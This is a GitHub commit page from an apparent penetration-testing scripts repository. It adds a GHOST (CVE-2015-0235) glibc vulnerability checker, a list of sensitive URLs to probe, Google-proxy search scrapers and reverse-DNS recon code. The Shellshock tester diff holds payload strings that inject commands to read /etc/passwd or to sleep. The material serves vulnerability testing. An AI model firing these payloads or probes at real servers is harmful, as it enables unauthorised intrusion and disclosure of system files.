Skip to content

Commit

Permalink
Merge branch 'master' of github.com:brock7/scripts
Browse files Browse the repository at this point in the history
  • Loading branch information
Brock committed Oct 11, 2015
2 parents dbf5987 + 15c6cc4 commit 30ba665
Show file tree
Hide file tree
Showing 17 changed files with 234 additions and 5 deletions.
Binary file removed DSFS/files/config.bmp
Binary file not shown.
Binary file removed DSFS/files/config.gif
Binary file not shown.
Binary file removed DSFS/files/config.jpg
Binary file not shown.
Binary file removed DSFS/files/config.png
Binary file not shown.
33 changes: 33 additions & 0 deletions exp/ghost.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
/*
 * CVE-2015-0235 ("GHOST") checker: vulnerable glibc versions could write
 * past the caller-supplied buffer in gethostbyname_r() for long
 * digits-and-dots hostnames.  A canary is placed directly after the
 * resolver buffer; if the lookup clobbers it, this glibc is vulnerable.
 * NOTE(review): appears to follow the Qualys advisory PoC — confirm.
 */
#define CANARY "in_the_coal_mine"

/* Fixed layout: 1024-byte resolver scratch buffer immediately followed
 * by the canary, so an overflow of `buffer` lands in `canary`. */
struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

/* Prints "vulnerable" or "not vulnerable" and exits EXIT_SUCCESS;
 * exits EXIT_FAILURE only if neither outcome occurred. */
int main(void) {
    struct hostent resbuf;
    struct hostent *result;
    int herrno;
    int retval;
    /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
    /* Name length chosen so glibc's internal size computation (formula
     * above) exactly exhausts the 1024-byte buffer: one more byte of
     * internal bookkeeping then overflows into the canary. */
    size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
    char name[sizeof(temp.buffer)];
    /* All-digit name: takes the numeric (digits-and-dots) parsing path
     * inside gethostbyname_r, where the overflow lives. */
    memset(name, '0', len);
    name[len] = '\0';
    retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
    /* Overflow happened: the canary no longer matches. */
    if (strcmp(temp.canary, CANARY) != 0) {
        puts("vulnerable");
        exit(EXIT_SUCCESS);
    }
    /* A patched glibc rejects the oversized request with ERANGE. */
    if (retval == ERANGE) {
        puts("not vulnerable");
        exit(EXIT_SUCCESS);
    }
    puts("should not happen");
    exit(EXIT_FAILURE);
}
Binary file removed files/config.bmp
Binary file not shown.
Binary file removed files/config.gif
Binary file not shown.
Binary file removed files/config.jpg
Binary file not shown.
Binary file removed files/config.png
Binary file not shown.
19 changes: 18 additions & 1 deletion gather.py
Original file line number Diff line number Diff line change
Expand Up @@ -58,7 +58,7 @@ def querySubdomain(domain):
for node in nodes:
print node, getTitle(node)

def queryRDNS(domain):
def queryRDNS_old(domain):
hostInfos = socket.gethostbyname_ex(domain) #r = (hostname, aliaslist, ipaddrlist)
for ipaddr in hostInfos[2]:
maxpage = 1
Expand All @@ -84,6 +84,23 @@ def queryRDNS(domain):
print e
#pass

def queryRDNS(domain):
hostInfos = socket.gethostbyname_ex(domain) #r = (hostname, aliaslist, ipaddrlist)
for ipaddr in hostInfos[2]:

print '[IP Address: ' + ipaddr + ']'
# TODO: 加入翻页代码
try:
response = urllib2.urlopen('http://dns.aizhan.com/%s/' % (ipaddr))
text = response.read()
tree = etree.HTML(text)
nodes = tree.xpath(r"//td[@class='dns-links']/a/@href")
for node in nodes:
print node, getTitle(node)
except Exception, e:
print e


def toStr(l):
#print type(l)
if type(l) != types.ListType:
Expand Down
23 changes: 23 additions & 0 deletions google-proxy.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
http://www.hxgoogle.com
http://www.gugesou.cn
http://www.google52.com
http://guge.droider.cn
http://www.gugeqq.com
https://www.52guge.com/
http://g.kvm.la
http://www.glcopy.com
http://www.guge.link/
https://www.booo.so/
http://www.gufensoso.com
http://www.g363.com
http://ggss.cc/
http://g.yh.gs
http://google.checkme.com.cn
http://www.googleforchina.com
https://goge.ml/
http://guge.droider.cn/
http://gg.cellmean.com/
http://g.eeload.com/
http://g.weme.so
http://g.lijun.me

2 changes: 1 addition & 1 deletion googleip.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@
import cookielib
import re
from lxml import etree
import ping
# import ping
import time

def ping(ip):
Expand Down
2 changes: 1 addition & 1 deletion tester/shock.py
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@

EXPLOIT1 = '() { :;};a=`/bin/cat /etc/passwd`;echo $a'
SLEEP_TIME = 7
EXPLOIT2 = '() { :;}; /bin/sleep %s' % SLEEP_TIME
EXPLOIT2 = '() { :;}; /bin/sleep %d' % SLEEP_TIME

#env -i X='() { (a)=>\' bash -c 'echo date'; cat echo
#无漏洞的输出:
Expand Down
34 changes: 34 additions & 0 deletions tr.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
#!/usr/bin/env python
# _*_ encoding: utf-8 _*_

import sys, os
import re

# Scan the source file named by argv[1] for double-quoted string
# literals and print each one as "startLine:startCol - endLine:endCol
# <literal>" (quotes included).  A backslash-escaped quote (\") does
# not terminate a literal.
lineNum = 0        # 1-based line counter
pos = 0            # 0-based column within the current line
startLine = 0;     # line where the current literal opened
startPos = 0;      # column where the current literal opened
prev = ''          # previous character, for \" escape detection
flag = 0           # 0 = outside a literal, 1 = inside one
str = ''           # accumulated literal text (NOTE(review): shadows builtin str)

for line in open(sys.argv[1]).readlines():
    lineNum += 1
    pos = 0
    for c in line:
        if c == '\"' and prev != '\\':
            if flag == 0:
                # Opening quote: remember where the literal starts.
                flag += 1
                startLine = lineNum
                startPos = pos
            elif flag == 1:
                # Closing quote: append it, then report the literal
                # unless the line looks like a comment line.
                str += c
                # NOTE(review): '[+s]*#' matches runs of '+'/'s' before
                # '#'; r'\s*#' (leading whitespace) was probably the
                # intent — confirm before changing.
                if re.search('[+s]*#', line) == None:
                    print "%d:%d - %d:%d %s" % (startLine, startPos, lineNum, pos, str)
                str = ''
                flag = 0
        if flag == 1:
            # Inside a literal (including its opening quote): accumulate.
            str += c;
        prev = c
        pos += 1

1 change: 1 addition & 0 deletions uris.txt
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php
/cgi-bin/test-cgi
7 changes: 5 additions & 2 deletions utils/google.py
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@
import aolsearch
import googlesearch
import bingsearch
import hxgoogle

#searchEngine = googlesearch.google
#searchEngine = aolsearch.google
Expand All @@ -11,7 +12,7 @@
if os.environ.has_key('search_engine'):
search_engine = os.environ['search_engine']
else:
search_engine = 'gfsoso'
search_engine = 'hxgoogle'

if search_engine == 'gfsoso':
google = gfsoso.google
Expand All @@ -21,8 +22,10 @@
google = aolsearch.google
elif search_engine == 'bing':
google = bingsearch.google
elif search_engine == 'hxgoogle':
google = hxgoogle.google
else:
google = gfsoso.google
google = hxgoogle.google

searchEngine = google

118 changes: 118 additions & 0 deletions utils/hxgoogle.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,118 @@
# -*- encoding: utf-8 -*-

import urllib, urllib2
import cookielib
import re
import sys, getopt
import os
import random
from lxml import etree
import time
import locale
import webutils

# Base URL of the hxgoogle.com Google proxy.
HXGOOGLE_HOME = 'http://www.hxgoogle.com'
# Results the engine shows per result page.
NUM_PER_PAGE = 10
# Per-request socket timeout, in seconds.
REQ_TIMEOUT = 20
# Total result count reported by the engine; stays sys.maxint (sentinel
# for "unknown") until _updateTotalRecord() parses the first page.
totalRecord = sys.maxint
# Seconds to sleep between page fetches; 0.0 disables throttling.
reqDelay = 0.0

# Matches the "found about N results" counter on a result page
# (Chinese-locale UI); group 1 is the comma-separated count.
pattern = re.compile(r'<div id="resultStats">找到约 ([0-9,]+) 条结果')
# Matches the "nothing matched your query" message (Chinese-locale UI).
pattern2 = re.compile(r'找不到和您的查询 "<em>.*?</em>" 相符的内容或信息。')

def _updateTotalRecord(html):
global totalRecord
m = pattern2.search(html)
if m != None:
totalRecord = 0
#print 'not found'
return
m = pattern.search(html)
if m == None:
return
if len(m.groups()) <= 0:
return
totalRecord = int(m.group(1).replace(',', ''))
print 'Total: ', totalRecord

def _hxPageHandler(opener, url):
    """Generator: fetch one result page at *url* through *opener* and
    yield each result URL found on it.

    Side effect: on the first successful page (while totalRecord is
    still the sys.maxint sentinel) updates the module-global count via
    _updateTotalRecord().  A fetch failure ends the generator with
    StopIteration (Python 2 generator idiom).
    """

    # print 'page handler'
    req = urllib2.Request(url)
    webutils.setupRequest(req)
    # NOTE(review): url[:-4] trims the trailing 'sa=N' so the Referer
    # resembles the previous page's URL — confirm intended.
    req.add_header('Referer', url[:-4])

    try:
        response = opener.open(req, timeout = REQ_TIMEOUT)
        html = response.read()
        # print html
    except Exception, e:
        print "Exception: url: %s - " % url, e
        raise StopIteration()
    # First page seen this search: learn the total result count.
    if totalRecord == sys.maxint:
        _updateTotalRecord(html)

    tree = etree.HTML(html)
    # nodes = tree.xpath(r'/html/body/table[2]/tbody/tr[2]/td[2]/ol/div/div[*]/div/h3/a/@href')
    # Result links are the anchors inside <h3> headings.
    nodes = tree.xpath(r'//h3/a/@href')


    for node in nodes:
        url = node
        yield url


def _hxSearch(opener, what, resultNum = -1, startNum = 0):
    """Generator: query the hxgoogle proxy for *what*, yielding result
    URLs page by page.

    opener    -- urllib2 opener used for every page fetch
    what      -- query string (URL-quoted here)
    resultNum -- maximum results to yield, or -1 for "all available"
    startNum  -- result offset to start from (rounded to a whole page)

    Terminates when resultNum is reached or when the engine-reported
    total (module-global totalRecord) is exhausted; sleeps reqDelay
    seconds between page fetches.  Uses `raise StopIteration()` inside
    the generator — a Python 2 idiom (invalid under PEP 479 / Python 3.7+).
    """
    if resultNum == -1:
        pageCount = -1
    else:
        # Pages needed to cover resultNum results, rounding up.
        pageCount = int((resultNum + NUM_PER_PAGE - 1) / NUM_PER_PAGE)

    startPage = int((startNum + NUM_PER_PAGE - 1) / NUM_PER_PAGE)

    # Reset the shared counter; the first fetched page re-populates it.
    global totalRecord
    totalRecord = sys.maxint

    what = urllib2.quote(what)

    pageNum = 1   # 1-based page index within this search
    resCnt = 0    # results yielded so far

    while True:
        if pageCount != -1:
            if pageNum > pageCount:
                break
        url = HXGOOGLE_HOME + '/search.jsp?q=%s&newwindow=1&safe=off&noj=1&hl=zh-CN&start=%d&sa=N' % (what, (startPage + pageNum) * 10)

        for result in _hxPageHandler(opener, url):
            # i += 1
            resCnt += 1
            yield result
            # Caller's limit reached: stop the generator.
            if resultNum != -1 and resCnt >= resultNum:
                raise StopIteration()
            # Engine has no more results than we already yielded.
            if resCnt >= totalRecord:
                raise StopIteration()

        # No counter could be parsed from any page: fall back to the
        # caller's limit so the loop still terminates.
        if totalRecord == sys.maxint:
            if resultNum == -1:
                totalRecord = sys.maxint - 1
            else:
                totalRecord = resultNum

        if resCnt >= totalRecord:
            raise StopIteration()
        #if i < NUM_PER_PAGE: # FIXME: if the result total is 10... :(
        # raise StopIteration()
        # break
        pageNum += 1
        if reqDelay > 0:
            time.sleep(reqDelay)

# Public entry point: search-engine modules in this project expose a
# callable named `google` (see the dispatch in utils/google.py).
google = _hxSearch

if __name__ == '__main__':
    # Smoke test: print the first 10 results of a site: query.
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    for url in google(opener, 'site:letv.com', 10):
        print url

0 comments on commit 30ba665

Please sign in to comment.